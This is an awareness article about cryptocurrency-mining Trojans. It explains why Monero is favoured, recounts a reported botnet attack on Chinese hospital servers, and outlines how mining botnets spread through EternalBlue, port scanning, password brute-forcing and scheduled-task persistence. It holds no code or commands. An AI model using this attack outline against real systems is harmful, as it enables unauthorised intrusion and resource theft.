Which coin is the most favorite of mining Trojans?

What’s mining Trojan?

Mining Trojan refers to the mining program implanted in the computer for mining without being known by the user. the mining Trojan appeared in 2013 for the first time, and the mining Trojan attacks reported in 2017 showed explosive growth.

Monero is the most favorite coin of mining Trojans due to all these “advantages”, more and more mining Trojans choose Monroe as the target

The following reasons for Monero

Good price of Monero. Although Monero cannot challenge Bitcoin in terms of its price, its price is still quite high.
Monroe is an anonymous coin with a high level of security. Anonymous coin refers to a special blockchain token that conceals the amount, the sender, and the receiver during the transaction. Due to such a special feature, no one can trace the transaction amount and the addresses of both parties in the blockchain browser, thus it greatly facilitates the hackers to transfer the Monero(Read
Monero coin is based on the CryptoNight algorithm, which can be conducted in CPU and GPU computers without other ASIC’s support.
There are many excellent open source Monero mining projects on the Internet, and hackers can use them “anytime”.
Monero is supported in the underground market.

In a recent news report, the servers in some big hospitals in China were hacked. The hackers violently cracked the remote login service of the hospital servers, then downloaded many mining Trojans by means of the file share function at some cloud service providers.

The attackers disguised the mining Trojan as a remote assistance tool Teamviewer. The mining Trojan would detect the process of up to 50 conventional mining programs and occupy all the resources after terminating other mining programs.

The mining Trojan can also ruin the OS security features by modifying the registry: disable UAC (User Account Control), disable Windows Defender, and shut down the warnings for running dangerous programs.

According to the analysis of known samples, the mining Trojans used by the attackers have multiple mining pools and the mined altcoins include Monero (XMR), Ethereum (ETH), Zero Coin (ZEC), etc. According to the pool information, the attackers have accumulated a profit of more than 58,000 US dollars.

As many as 50% of medical institutions in China have enabled remote login services (port number: 22), which means that half of the servers may suffer from similar attacks.

How is the mining Trojan botnet realized?

The realizing of the mining Trojan botnet is generally carried out in three steps.

I. Establishment of Botnet

Whether the botnet can be scaled up largely depends on its initial establishment. Hackers need a powerful weapon capable of large-scale invasion to control more computers. And the attack weapon is nothing but a tool to make use of different operating system bugs.

In April 2017, the shadow broker released the bug attack weapon, the “EternalBlue”, organized by the NSA. The “WannaCry” ransomware which caused an unprecedented impact in May 2017 was spread by the “EternalBlue”. Most of the mining Trojan botnets that broke out in the first half of 2017 also relied on the “EternalBlue” to achieve the initial establishment.

“EternalBlue” has two advantages beyond the challenges of most bug tools:

No carrier to launch attacks. Unlike “passive attacks” which were launched by browser bugs or office software bugs, the “EternalBlue” is a kind of “active attack” with which the hackers only need to send attack packets to the target without additional operations.
Wide range of targets. So long as the target computer opens port 445 without prompt patches, the hackers can successfully invade the target computer. The hackers can scan the full network for the prey. Hence, the “EternalBlue” has become the standard configuration for mining Trojan botnets.

As more details of the bugs have been revealed, a variety of “EternalBlue” tools became available. The”mateMiner” botnet, which came into being in September 2017 at fast growing speed, was integrated with the “EternalBlue” written by PowerShell.

II. Expansion of Botnets

When the botnet takes shape, hackers need to attack more computers by means of the existing puppet computers to gain visible benefits by means of the increase in quantity. Therefore, every puppet computer in the botnet acts as the initiator of the attack, and the target is just all the computers on the Internet.

Bug tools are still playing an important role in the expansion of botnets. After the hackers have controlled a certain number of puppets, they will make use of them to attack more computers. Due to a large number of puppet computers, the efficiency of bug scans and bug attacks on other computers is much higher than that of hacker-controlled terminals, which helps hackers expand the botnets.

Port scanning and cracking also boost the botnet expansion. Take the “Anonymous” botnet as an example, the program carries a full-network scanning module to continuously perform a specified port scanning on random IP addresses. If the port is open, it will try to perform cracking and log in to the target computer.

III. Continuous Residency of Botnet

Whether the hacker can continuously control the puppet depends on whether the botnets can continuously reside in the puppet. The mining Trojan botnet also tries every means to reside in the puppet computer continuously.

It is the best choice to implant botnets directly into the system process. Computers are implanted with mining Trojans and botnets for the sake of further expansion.

The most common attacks, such as servers being hacked, Redis database bugs, MySQL database bugs, etc., all of which aim to make the server act as a mining machine.

The process can be described as follows: scan server default port, if no password protection, it’s easy to be cracked; if it’s protected by password, it may also be cracked by brute force. Set up scheduled tasks, implant Trojans, and start the mining process.

The hacker uses the computer not only to conduct mining but also to search for other servers as an attacker so that the mining Trojans will quickly infect the servers in the whole network and establish a complete mining trojan botnet.

Through the above introduction, do you have a clear understanding of the mining Trojan botnet? Finally, we hope that everyone pays attention to the safety of your computers and miners, and happy mining.